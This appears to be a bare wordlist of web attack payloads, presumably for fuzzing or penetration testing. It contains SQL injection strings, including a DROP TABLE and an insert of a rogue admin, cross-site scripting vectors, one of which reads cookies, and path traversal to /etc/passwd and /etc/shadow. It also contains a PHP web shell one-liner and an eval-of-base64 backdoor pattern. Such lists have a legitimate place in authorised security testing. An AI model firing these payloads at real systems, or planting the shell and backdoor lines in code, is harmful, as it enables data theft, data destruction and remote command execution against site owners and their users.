' OR 1=1 --
<script>alert(1)</script>
admin' OR '1'='1
../../../etc/passwd
'; DROP TABLE users; --
<img src=x onerror=alert(1)>
' UNION SELECT * FROM users--
javascript:alert(document.cookie)
../admin/config.php
' OR 'a'='a' --
<iframe src=javascript:alert(1)>
'; INSERT INTO admins VALUES('hacker')--
../../../../../windows/system32/
eval(base64_decode($_GET[x]))
<svg onload=alert(1)>
' AND 1=CONVERT(int, SELECT @@version)--
<?php system($_GET['cmd']); ?>
../etc/shadow
' OR EXISTS(SELECT * FROM users)--
<body onload=alert(1)>